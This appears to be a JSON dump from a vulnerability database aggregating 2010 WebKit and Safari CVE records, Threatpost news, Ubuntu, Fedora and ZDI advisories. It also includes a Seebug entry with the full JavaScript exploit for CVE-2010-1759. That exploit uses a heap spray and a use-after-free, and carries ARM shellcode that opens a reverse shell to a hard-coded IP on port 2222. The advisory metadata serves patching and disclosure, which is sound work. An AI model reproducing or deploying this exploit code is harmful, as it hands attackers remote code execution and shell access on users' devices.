"2020-12-09T19:34:38", "description": "Use-after-free vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors related to a layout change during selection rendering and the DOCUMENT_POSITION_DISCONNECTED attribute in a container of an unspecified type.", "edition": 5, "cvss3": {}, "published": "2010-06-11T18:00:00", "title": "CVE-2010-1397", "type": "cve", "cwe": ["CWE-399"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1397"], "modified": "2018-10-10T19:56:00", "cpe": ["cpe:/a:apple:safari:4.0.1", "cpe:/a:apple:safari:4.0.5", "cpe:/a:apple:safari:4.0.2", "cpe:/a:apple:webkit:*", "cpe:/a:apple:safari:4.0", "cpe:/a:apple:safari:4.0.4", "cpe:/a:apple:safari:4.0.3", "cpe:/a:apple:safari:4.0.0b"], "id": "CVE-2010-1397", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-1397", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:apple:safari:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:4.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:4.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:4.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:apple:webkit:*:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:4.0.0b:*:*:*:*:*:*:*"]}], "threatpost": [{"lastseen": "2018-10-06T23:07:40", "bulletinFamily": "info", "cvelist": ["CVE-2009-1726", "CVE-2010-1119", "CVE-2010-1384", "CVE-2010-1385", "CVE-2010-1392", "CVE-2010-1422", "CVE-2010-1750"], "description": "[](<https://threatpost.com/apple-plugs-48-security-holes-safari-browser-060810/>)Apple has shipped new versions of its Safari browser with patches for at least 48 security vulnerabilities.\n\nThe Safari 4.1 and 5.0 updates, considered \u201chighly critical,\u201d is available for both Windows and Mac OS X. Exploitation of some of these vulnerabilities could lead to drive-by download (remote code execution) attacks.\n\nThe majority of the documented vulnerabilities affected WebKit, the open-source Web browser engine that powers Safari.\n\nHere\u2019s the skinny on some of the more critical issues:\n\n * ColorSync (CVE-2009-1726) \u2014 A heap buffer overflow exists in the handling of images with an embedded ColorSync profile. Opening a maliciously crafted image with an embedded ColorSync profile may lead to an unexpected application termination or arbitrary code execution. \n * Safari (CVE-2010-1384) \u2014 Safari supports the inclusion of user information in URLs, which allows the URL to specify a username and password to authenticate the user to the named server. These URLs are often used to confuse users, which can potentially aid phishing attacks. \n * Safari (CVE-2010-1385) \u2014 A use after free issue exists in Safari\u2019s handling of PDF files. Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution. \n * Safari (CVE-2010-1750) \u2014 A use after free issue exists in Safari\u2019s management of windows. Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution.\n * WebKit (CVE-2010-1392) \u2014 A use after free issue exists in WebKit\u2019s rendering of HTML buttons. Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution. \n * WebKit (CVE-2010-1119) \u2014 A use after free issue exists in WebKit\u2019s handling of attribute manipulation. Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution. \n * WebKit (CVE-2010-1422) \u2014 An implementation issue exists in WebKit\u2019s handling of keyboard focus. If the keyboard focus changes during the processing of key presses, WebKit may deliver an event to the newly-focused frame, instead of the frame that had focus when the key press occurred. A maliciously crafted website may be able to manipulate a user into taking an unexpected action, such as initiating a purchase. \n\nSafari 5.0 and Safari 4.1 address the same set of security issues. \n", "modified": "2018-08-15T12:37:22", "published": "2010-06-08T13:06:29", "id": "THREATPOST:22ED6878D0517D9CCACC4081F9960C6C", "href": "https://threatpost.com/apple-plugs-48-security-holes-safari-browser-060810/74072/", "type": "threatpost", "title": "Apple Plugs 48 Security Holes in Safari Browser", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "ubuntu": [{"lastseen": "2020-07-09T00:24:08", "bulletinFamily": "unix", "cvelist": ["CVE-2010-0049", "CVE-2010-0052", "CVE-2010-1412", "CVE-2010-1397", "CVE-2010-1416", "CVE-2010-1396", "CVE-2010-1417", "CVE-2010-3257", "CVE-2010-1409", "CVE-2010-0046", "CVE-2010-0651", "CVE-2010-1760", "CVE-2010-0054", "CVE-2010-1783", "CVE-2009-2841", "CVE-2010-1758", "CVE-2010-1787", "CVE-2010-1771", "CVE-2009-2797", "CVE-2010-1410", "CVE-2010-1807", "CVE-2010-3116", "CVE-2010-0048", "CVE-2010-3113", "CVE-2010-1415", "CVE-2010-1419", "CVE-2010-1407", "CVE-2010-1780", "CVE-2010-1766", "CVE-2010-1772", "CVE-2010-1389", "CVE-2010-1391", "CVE-2010-1664", "CVE-2010-1387", "CVE-2010-1759", "CVE-2010-2647", "CVE-2010-0650", "CVE-2010-1786", "CVE-2010-1773", "CVE-2010-1785", "CVE-2010-2648", "CVE-2010-3114", "CVE-2010-1774", "CVE-2010-1395", "CVE-2010-1400", "CVE-2010-2264", "CVE-2010-0314", "CVE-2010-1406", "CVE-2010-1418", "CVE-2010-1398", "CVE-2010-1790", "CVE-2010-1401", "CVE-2010-1788", "CVE-2010-1781", "CVE-2010-1815", "CVE-2010-1408", "CVE-2010-1403", "CVE-2010-1404", "CVE-2010-1761", "CVE-2010-1782", "CVE-2010-1814", "CVE-2010-1665", "CVE-2010-3115", "CVE-2010-1792", "CVE-2010-1422", "CVE-2010-1390", "CVE-2010-1767", "CVE-2010-3259", "CVE-2010-0656", "CVE-2010-1812", "CVE-2010-1393", "CVE-2010-1770", "CVE-2010-1392", "CVE-2010-0647", "CVE-2010-1784", "CVE-2010-0053", "CVE-2010-0047", "CVE-2010-0051", "CVE-2010-1402", "CVE-2010-3248", "CVE-2010-1762", "CVE-2010-0050", "CVE-2010-1386", "CVE-2010-1764", "CVE-2010-1405", "CVE-2010-1414", "CVE-2010-1421", "CVE-2010-1394", "CVE-2010-1793"], "description": "A large number of security issues were discovered in the WebKit browser and \nJavaScript engines. If a user were tricked into viewing a malicious \nwebsite, a remote attacker could exploit a variety of issues related to web \nbrowser security, including cross-site scripting attacks, denial of \nservice attacks, and arbitrary code execution.\n\nPlease consult the bug listed at the top of this advisory to get the exact \nlist of CVE numbers fixed for each release.", "edition": 15, "modified": "2010-10-19T00:00:00", "published": "2010-10-19T00:00:00", "id": "USN-1006-1", "href": "https://ubuntu.com/security/notices/USN-1006-1", "title": "WebKit vulnerabilities", "type": "ubuntu", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "fedora": [{"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2010-1386", "CVE-2010-1392", "CVE-2010-1405", "CVE-2010-1407", "CVE-2010-1416", "CVE-2010-1417", "CVE-2010-1418", "CVE-2010-1421", "CVE-2010-1422", "CVE-2010-1501", "CVE-2010-1664", "CVE-2010-1665", "CVE-2010-1758", "CVE-2010-1759", "CVE-2010-1760", "CVE-2010-1761", "CVE-2010-1762", "CVE-2010-1767", "CVE-2010-1770", "CVE-2010-1771", "CVE-2010-1772", "CVE-2010-1773", "CVE-2010-1774", "CVE-2010-1780", "CVE-2010-1782", "CVE-2010-1783", "CVE-2010-1784", "CVE-2010-1785", "CVE-2010-1786", "CVE-2010-1787", "CVE-2010-1788", "CVE-2010-1790", "CVE-2010-1792", "CVE-2010-1793", "CVE-2010-2264", "CVE-2010-2648"], "description": "WebKitGTK+ is the port of the portable web rendering engine WebKit to the GTK+ platform. ", "modified": "2010-09-21T01:43:18", "published": "2010-09-21T01:43:18", "id": "FEDORA:AEC99110E7A", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 12 Update: webkitgtk-1.2.4-1.fc12", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2010-1386", "CVE-2010-1392", "CVE-2010-1405", "CVE-2010-1407", "CVE-2010-1416", "CVE-2010-1417", "CVE-2010-1418", "CVE-2010-1421", "CVE-2010-1422", "CVE-2010-1501", "CVE-2010-1664", "CVE-2010-1665", "CVE-2010-1758", "CVE-2010-1759", "CVE-2010-1760", "CVE-2010-1761", "CVE-2010-1762", "CVE-2010-1767", "CVE-2010-1770", "CVE-2010-1771", "CVE-2010-1772", "CVE-2010-1773", "CVE-2010-1774", "CVE-2010-1780", "CVE-2010-1782", "CVE-2010-1783", "CVE-2010-1784", "CVE-2010-1785", "CVE-2010-1786", "CVE-2010-1787", "CVE-2010-1788", "CVE-2010-1790", "CVE-2010-1792", "CVE-2010-1793", "CVE-2010-2264", "CVE-2010-2648"], "description": "WebKitGTK+ is the port of the portable web rendering engine WebKit to the GTK+ platform. ", "modified": "2010-09-15T05:40:48", "published": "2010-09-15T05:40:48", "id": "FEDORA:B9475110A91", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 13 Update: webkitgtk-1.2.4-1.fc13", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2009-2841", "CVE-2010-0047", "CVE-2010-0648", "CVE-2010-0656", "CVE-2010-1119", "CVE-2010-1303", "CVE-2010-1392", "CVE-2010-1396", "CVE-2010-1397", "CVE-2010-1398", "CVE-2010-1400", "CVE-2010-1412", "CVE-2010-1766", "CVE-2010-1770", "CVE-2010-1772", "CVE-2010-1773", "CVE-2010-1774", "CVE-2010-1778"], "description": "Qt is a software toolkit for developing applications. This package contains base tools, like string, xml, and network handling. ", "modified": "2010-07-13T07:40:16", "published": "2010-07-13T07:40:16", "id": "FEDORA:059E31111B3", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 13 Update: qt-4.6.3-8.fc13", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2010-1386", "CVE-2010-1392", "CVE-2010-1405", "CVE-2010-1407", "CVE-2010-1416", "CVE-2010-1417", "CVE-2010-1418", "CVE-2010-1421", "CVE-2010-1422", "CVE-2010-1501", "CVE-2010-1664", "CVE-2010-1665", "CVE-2010-1758", "CVE-2010-1759", "CVE-2010-1760", "CVE-2010-1761", "CVE-2010-1762", "CVE-2010-1767", "CVE-2010-1770", "CVE-2010-1771", "CVE-2010-1772", "CVE-2010-1773", "CVE-2010-1774", "CVE-2010-1780", "CVE-2010-1782", "CVE-2010-1784", "CVE-2010-1785", "CVE-2010-1786", "CVE-2010-1787", "CVE-2010-1788", "CVE-2010-1790", "CVE-2010-1792", "CVE-2010-1793", "CVE-2010-1807", "CVE-2010-1812", "CVE-2010-1814", "CVE-2010-1815", "CVE-2010-2264", "CVE-2010-2648", "CVE-2010-3113", "CVE-2010-3114", "CVE-2010-3115", "CVE-2010-3116", "CVE-2010-3257", "CVE-2010-3259"], "description": "WebKitGTK+ is the port of the portable web rendering engine WebKit to the GTK+ platform. ", "modified": "2010-10-19T07:09:06", "published": "2010-10-19T07:09:06", "id": "FEDORA:2EC081110A7", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 12 Update: webkitgtk-1.2.5-1.fc12", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2010-1386", "CVE-2010-1392", "CVE-2010-1405", "CVE-2010-1407", "CVE-2010-1416", "CVE-2010-1417", "CVE-2010-1418", "CVE-2010-1421", "CVE-2010-1422", "CVE-2010-1501", "CVE-2010-1664", "CVE-2010-1665", "CVE-2010-1758", "CVE-2010-1759", "CVE-2010-1760", "CVE-2010-1761", "CVE-2010-1762", "CVE-2010-1767", "CVE-2010-1770", "CVE-2010-1771", "CVE-2010-1772", "CVE-2010-1773", "CVE-2010-1774", "CVE-2010-1780", "CVE-2010-1782", "CVE-2010-1784", "CVE-2010-1785", "CVE-2010-1786", "CVE-2010-1787", "CVE-2010-1788", "CVE-2010-1790", "CVE-2010-1792", "CVE-2010-1793", "CVE-2010-1807", "CVE-2010-1812", "CVE-2010-1814", "CVE-2010-1815", "CVE-2010-2264", "CVE-2010-2648", "CVE-2010-3113", "CVE-2010-3114", "CVE-2010-3115", "CVE-2010-3116", "CVE-2010-3257", "CVE-2010-3259"], "description": "WebKitGTK+ is the port of the portable web rendering engine WebKit to the GTK+ platform. ", "modified": "2010-10-19T07:21:56", "published": "2010-10-19T07:21:56", "id": "FEDORA:278B9111139", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 13 Update: webkitgtk-1.2.5-1.fc13", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2009-2841", "CVE-2010-0046", "CVE-2010-0047", "CVE-2010-0049", "CVE-2010-0050", "CVE-2010-0051", "CVE-2010-0052", "CVE-2010-0054", "CVE-2010-0648", "CVE-2010-0656", "CVE-2010-1119", "CVE-2010-1303", "CVE-2010-1392", "CVE-2010-1396", "CVE-2010-1397", "CVE-2010-1398", "CVE-2010-1400", "CVE-2010-1412", "CVE-2010-1766", "CVE-2010-1770", "CVE-2010-1772", "CVE-2010-1773", "CVE-2010-1774", "CVE-2010-1778"], "description": "Qt is a software toolkit for developing applications. This package contains base tools, like string, xml, and network handling. ", "modified": "2010-07-13T07:43:47", "published": "2010-07-13T07:43:47", "id": "FEDORA:350F6111223", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 12 Update: qt-4.6.3-8.fc12", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2010-1386", "CVE-2010-1392", "CVE-2010-1405", "CVE-2010-1407", "CVE-2010-1416", "CVE-2010-1417", "CVE-2010-1418", "CVE-2010-1421", "CVE-2010-1422", "CVE-2010-1501", "CVE-2010-1664", "CVE-2010-1665", "CVE-2010-1758", "CVE-2010-1759", "CVE-2010-1760", "CVE-2010-1761", "CVE-2010-1762", "CVE-2010-1767", "CVE-2010-1770", "CVE-2010-1771", "CVE-2010-1772", "CVE-2010-1773", "CVE-2010-1774", "CVE-2010-1780", "CVE-2010-1782", "CVE-2010-1784", "CVE-2010-1785", "CVE-2010-1786", "CVE-2010-1787", "CVE-2010-1788", "CVE-2010-1790", "CVE-2010-1791", "CVE-2010-1792", "CVE-2010-1793", "CVE-2010-1807", "CVE-2010-1812", "CVE-2010-1814", "CVE-2010-1815", "CVE-2010-2264", "CVE-2010-2648", "CVE-2010-3113", "CVE-2010-3114", "CVE-2010-3115", "CVE-2010-3116", "CVE-2010-3119", "CVE-2010-3255", "CVE-2010-3257", "CVE-2010-3259", "CVE-2010-3812", "CVE-2010-3813", "CVE-2010-4197", "CVE-2010-4198", "CVE-2010-4204", "CVE-2010-4206", "CVE-2010-4577"], "description": "WebKitGTK+ is the port of the portable web rendering engine WebKit to the GTK+ platform. ", "modified": "2011-01-07T20:01:55", "published": "2011-01-07T20:01:55", "id": "FEDORA:643E6110B91", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 13 Update: webkitgtk-1.2.6-1.fc13", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2010-1386", "CVE-2010-1392", "CVE-2010-1405", "CVE-2010-1407", "CVE-2010-1416", "CVE-2010-1417", "CVE-2010-1418", "CVE-2010-1421", "CVE-2010-1422", "CVE-2010-1501", "CVE-2010-1664", "CVE-2010-1665", "CVE-2010-1758", "CVE-2010-1759", "CVE-2010-1760", "CVE-2010-1761", "CVE-2010-1762", "CVE-2010-1767", "CVE-2010-1770", "CVE-2010-1771", "CVE-2010-1772", "CVE-2010-1773", "CVE-2010-1774", "CVE-2010-1780", "CVE-2010-1782", "CVE-2010-1784", "CVE-2010-1785", "CVE-2010-1786", "CVE-2010-1787", "CVE-2010-1788", "CVE-2010-1790", "CVE-2010-1791", "CVE-2010-1792", "CVE-2010-1793", "CVE-2010-1807", "CVE-2010-1812", "CVE-2010-1814", "CVE-2010-1815", "CVE-2010-2264", "CVE-2010-2648", "CVE-2010-2901", "CVE-2010-3113", "CVE-2010-3114", "CVE-2010-3115", "CVE-2010-3116", "CVE-2010-3119", "CVE-2010-3255", "CVE-2010-3257", "CVE-2010-3259", "CVE-2010-3812", "CVE-2010-3813", "CVE-2010-4040", "CVE-2010-4042", "CVE-2010-4197", "CVE-2010-4198", "CVE-2010-4199", "CVE-2010-4204", "CVE-2010-4206", "CVE-2010-4492", "CVE-2010-4493", "CVE-2010-4578", "CVE-2011-0482", "CVE-2011-0778"], "description": "WebKitGTK+ is the port of the portable web rendering engine WebKit to the GTK+ platform. ", "modified": "2011-02-18T01:51:56", "published": "2011-02-18T01:51:56", "id": "FEDORA:40EED1109D9", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 13 Update: webkitgtk-1.2.7-1.fc13", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T17:57:51", "description": "No description provided by source.", "published": "2012-02-14T00:00:00", "title": "Webkit normalize bug for android 2.2 (CVE-2010-1759)", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1759"], "modified": "2012-02-14T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-30108", "id": "SSV:30108", "sourceData": "\n <!--\r\nCVE-2010-1759 webkit normalize bug\r\nTested on\r\n Moto Droidx2 running 2.2. Droidx2 running 2.3 is vulnerable but exploit fails due to non-executable heap. Still working on a way around that :)\r\n 2.1 - 2.3 emulator. The changes needed are documented in the code. The emulator is less consistent than the real phone\r\nAuthor: MJ Keith mjkeith[at]evilhippie.org\r\n-->\r\n<p>LOADING... </p>\r\n<div id="test1"></div>\r\n<div id="test2"></div>\r\n<div id="test3"></div>\r\n<script>\r\nvar elem1 = document.getElementById("test1");\r\nvar elem2 = document.getElementById("test2");\r\nvar elem3 = document.getElementById("test3");\r\nfunction spray()\r\n{\r\nfor (var i = 0; i < 180000; i++) {var s = new String(unescape("\\u0052\\u0052")); } // "\\u0056\\u0056" FOR EMULATOR\r\nvar scode = unescape("\\u5200\\u5200"); // "\\u0058\\u0058" FOR EMULATOR\r\nvar scode2 = unescape("\\u5005\\ue1a0");\r\nvar shell = unescape("\\u0002\\ue3a0\\u1001\\ue3a0\\u2005\\ue281\\u708c\\ue3a0\\u708d\\ue287\\u0080\\uef00\\u6000\\ue1a0\\u1084\\ue28f\\u2010\\ue3a0\\u708d\\ue3a0\\u708e\\ue287\\u0080\\uef00\\u0006\\ue1a0\\u1000\\ue3a0\\u703f\\ue3a0\\u0080\\uef00\\u0006\\ue1a0\\u1001\\ue3a0\\u703f\\ue3a0\\u0080\\uef00\\u0006\\ue1a0\\u1002\\ue3a0\\u703f\\ue3a0\\u0080\\uef00\\u2001\\ue28f\\uff12\\ue12f\\u4040\\u2717\\udf80\\ua005\\ua508\\u4076\\u602e\\u1b6d\\ub420\\ub401\\u4669\\u4052\\u270b\\udf80\\u2f2f\\u732f\\u7379\\u6574\\u2f6d\\u6962\\u2f6e\\u6873\\u2000\\u2000\\u2000\\u2000\\u2000\\u2000\\u2000\\u2000\\u2000\\u2000\\u0002");\r\nshell += unescape("\\uae08"); // Port = 2222\r\nshell += unescape("\\ua8c0\\u0901"); // IP = 192.168.1.9 // "\\u000a\\u0202" FOR EMULATOR\r\nshell += unescape("\\u2000\\u2000"); // Port = 2222\r\n do\r\n {\r\n scode += scode;\r\n scode2 += scode2;\r\n } while (scode.length<=0x1000);\r\nscode2 += shell\r\n target = new Array();\r\n for(i = 0; i < 141; i++){ // CHANGE 141 TO 201 FOR EMULATOR\r\n if (i<100){ target[i] = scode;}\r\n if (i>100){ target[i] = scode2;}\r\n document.write(target[i]);\r\n document.write("<br />");\r\n if (i>140){ // CHANGE 140 TO 200 FOR EMULATOR\r\n document.write("<br />");}\r\n }\r\n}\r\nfunction handler1()\r\n{\r\n elem1.removeAttribute("b");\r\n spray();\r\n}\r\nfunction handler2()\r\n{\r\n elem2.removeAttribute("b");\r\n spray();\r\n}\r\nfunction handler3()\r\n{\r\n elem3.removeAttribute("b");\r\n spray();\r\n}\r\nfunction slowdown()\r\n{\r\nfor (var i = 0; i < 120; i++) { console.log('slow' + i);\r\n if (i > 110 ){ elem1.normalize(); elem2.normalize(); elem3.normalize();\r\n}\r\n}\r\n}\r\nelem1.setAttribute("b", "a");\r\nelem1.attributes[0].appendChild(document.createTextNode("hi"));\r\nelem1.attributes[0].addEventListener("DOMSubtreeModified", handler2, false);\r\ndocument.body.offsetTop;\r\nslowdown(); // COMMENT OUT THIS FUNCTION CALL FOR EMULATOR\r\n//elem1.normalize(); // UN-COMMENT THIS LINE FOR EMULATOR\r\ndocument.body.offsetTop;\r\nelem2.setAttribute("b", "a");\r\nelem2.attributes[0].appendChild(document.createTextNode("hi"));\r\nelem2.attributes[0].addEventListener("DOMSubtreeModified", handler2, false);\r\ndocument.body.offsetTop;\r\nelem2.normalize();\r\nelem3.setAttribute("b", "a");\r\nelem3.attributes[0].appendChild(document.createTextNode("hi"));\r\nelem3.attributes[0].addEventListener("DOMSubtreeModified", handler3, false);\r\ndocument.body.offsetTop;\r\nelem3.normalize();\r\n</script>\n ", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-30108"}], "zdi": [{"lastseen": "2020-06-22T11:41:37", "bulletinFamily": "info", "cvelist": ["CVE-2010-1404"], "edition": 3, "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple's Webkit. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within how the WebKit library handles recursively defined Use elements. Upon expanding the target of the use element within the tree, the application will create a dual-reference of a Use element. Upon page deconstruction the application will destroy the single reference and then attempt to destroy the second one that is currently occupying the recently freed memory. Successful exploitation can lead to code execution under the context of the application.", "modified": "2010-06-22T00:00:00", "published": "2010-06-08T00:00:00", "href": "https://www.zerodayinitiative.com/advisories/ZDI-10-096/", "id": "ZDI-10-096", "title": "Apple Webkit Recursive Use Element Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-22T11:41:58", "bulletinFamily": "info", "cvelist": ["CVE-2010-1403"], "edition": 3, "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple's Webkit. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists with how WebKit inserts error messages into documents utilizing the SVG namespace. Upon a parsing error the library will attempt to access an element before repairing the XML. This will cause the library to access uninitialized memory which can lead to code execution under the context of the application.", "modified": "2010-06-22T00:00:00", "published": "2010-06-08T00:00:00", "href": "https://www.zerodayinitiative.com/advisories/ZDI-10-099/", "id": "ZDI-10-099", "title": "Apple Webkit ProcessInstruction Target Error Message Insertion Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}